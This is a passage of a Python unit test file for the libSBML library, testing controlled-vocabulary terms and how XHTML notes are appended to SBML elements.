res = self.S.getCVTerm(0).getResources()
self.assert_(( "foo" == res.getValue(0) ))
cv1 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv1.setBiologicalQualifierType(libsbml.BQB_IS)
cv1.addResource( "bar")
self.S.addCVTerm(cv1)
self.assert_( self.S.getNumCVTerms() == 2 )
cv2 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv2.setBiologicalQualifierType(libsbml.BQB_IS)
cv2.addResource( "bar1")
self.S.addCVTerm(cv2)
self.assert_( self.S.getNumCVTerms() == 2 )
res = self.S.getCVTerm(1).getResources()
self.assert_( res.getLength() == 2 )
self.assert_(( "bar" == res.getValue(0) ))
self.assert_(( "bar1" == res.getValue(1) ))
cv4 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv4.setBiologicalQualifierType(libsbml.BQB_IS)
cv4.addResource( "bar1")
self.S.addCVTerm(cv4)
self.assert_( self.S.getNumCVTerms() == 2 )
res = self.S.getCVTerm(1).getResources()
self.assert_( res.getLength() == 2 )
self.assert_(( "bar" == res.getValue(0) ))
self.assert_(( "bar1" == res.getValue(1) ))
cv5 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv5.setBiologicalQualifierType(libsbml.BQB_HAS_PART)
cv5.addResource( "bar1")
self.S.addCVTerm(cv5)
self.assert_( self.S.getNumCVTerms() == 2 )
res = self.S.getCVTerm(1).getResources()
self.assert_( res.getLength() == 2 )
self.assert_(( "bar" == res.getValue(0) ))
self.assert_(( "bar1" == res.getValue(1) ))
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv4 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes(self):
triple = libsbml.XMLTriple("p", "", "")
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
token4 = libsbml.XMLToken("This is my text")
node4 = libsbml.XMLNode(token4)
token5 = libsbml.XMLToken("This is additional text")
node5 = libsbml.XMLNode(token5)
token = libsbml.XMLToken(triple,att,ns)
node = libsbml.XMLNode(token)
node.addChild(node4)
self.S.setNotes(node)
self.assert_( self.S.isSetNotes() == True )
token1 = libsbml.XMLToken(triple,att,ns)
node1 = libsbml.XMLNode(token1)
node1.addChild(node5)
self.S.appendNotes(node1)
self.assert_( self.S.isSetNotes() == True )
node2 = self.S.getNotes()
self.assert_( node2.getNumChildren() == 2 )
self.assert_(( "p" == node2.getChild(0).getName() ))
self.assert_( node2.getChild(0).getNumChildren() == 1 )
self.assert_(( "p" == node2.getChild(1).getName() ))
self.assert_( node2.getChild(1).getNumChildren() == 1 )
chars1 = node2.getChild(0).getChild(0).getCharacters()
chars2 = node2.getChild(1).getChild(0).getCharacters()
self.assert_(( "This is my text" == chars1 ))
self.assert_(( "This is additional text" == chars2 ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes1(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
html_node = libsbml.XMLNode(html_token)
head_node = libsbml.XMLNode(head_token)
title_node = libsbml.XMLNode(title_token)
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
html_node1 = libsbml.XMLNode(html_token)
head_node1 = libsbml.XMLNode(head_token)
title_node1 = libsbml.XMLNode(title_token)
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
head_node.addChild(title_node)
html_node.addChild(head_node)
html_node.addChild(body_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
head_node1.addChild(title_node1)
html_node1.addChild(head_node1)
html_node1.addChild(body_node1)
self.S.setNotes(html_node)
self.S.appendNotes(html_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes2(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
html_node = libsbml.XMLNode(html_token)
head_node = libsbml.XMLNode(head_token)
title_node = libsbml.XMLNode(title_token)
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
body_token1 = libsbml.XMLToken(body_triple,att,ns)
text_token1 = libsbml.XMLToken("This is more text")
body_node1 = libsbml.XMLNode(body_token1)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
head_node.addChild(title_node)
html_node.addChild(head_node)
html_node.addChild(body_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
self.S.setNotes(html_node)
self.S.appendNotes(body_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes3(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
html_node = libsbml.XMLNode(html_token)
head_node = libsbml.XMLNode(head_token)
title_node = libsbml.XMLNode(title_token)
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token1 = libsbml.XMLToken("This is more text")
p_node1 = libsbml.XMLNode(p_token1)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
head_node.addChild(title_node)
html_node.addChild(head_node)
html_node.addChild(body_node)
p_node1.addChild(text_node1)
self.S.setNotes(html_node)
self.S.appendNotes(p_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes4(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
body_token1 = libsbml.XMLToken(body_triple,att,ns)
text_token = libsbml.XMLToken("This is my text")
body_node = libsbml.XMLNode(body_token1)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
html_node1 = libsbml.XMLNode(html_token)
head_node1 = libsbml.XMLNode(head_token)
title_node1 = libsbml.XMLNode(title_token)
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
head_node1.addChild(title_node1)
html_node1.addChild(head_node1)
html_node1.addChild(body_node1)
self.S.setNotes(body_node)
self.S.appendNotes(html_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes5(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token = libsbml.XMLToken("This is my text")
p_node = libsbml.XMLNode(p_token1)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
html_node1 = libsbml.XMLNode(html_token)
head_node1 = libsbml.XMLNode(head_token)
title_node1 = libsbml.XMLNode(title_token)
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
head_node1.addChild(title_node1)
html_node1.addChild(head_node1)
html_node1.addChild(body_node1)
self.S.setNotes(p_node)
self.S.appendNotes(html_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes6(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
body_token = libsbml.XMLToken(body_triple,att,ns)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
self.S.setNotes(body_node)
self.S.appendNotes(body_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes7(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
body_token = libsbml.XMLToken(body_triple,att,ns)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token = libsbml.XMLToken("This is my text")
p_token = libsbml.XMLToken(p_triple,att)
p_node = libsbml.XMLNode(p_token1)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
self.S.setNotes(p_node)
self.S.appendNotes(body_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes8(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
body_token = libsbml.XMLToken(body_triple,att,ns)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
p_token1 = libsbml.XMLToken(p_triple,att,ns)
text_token1 = libsbml.XMLToken("This is more text")
p_node1 = libsbml.XMLNode(p_token1)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
p_node1.addChild(text_node1)
self.S.setNotes(body_node)
self.S.appendNotes(p_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotesString(self):
notes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>";
taggednewnotes = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
"</notes>")
taggednewnotes2 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
newnotes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>";
newnotes2 = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>" + "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>";
newnotes3 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" + "</notes>")
newnotes4 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
self.S.setNotes(notes)
self.assert_( self.S.isSetNotes() == True )
self.S.appendNotes(newnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(newnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes2 ))
self.S.setNotes(notes)
self.S.appendNotes(newnotes3)
notes3 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes3 == taggednewnotes ))
self.S.setNotes(notes)
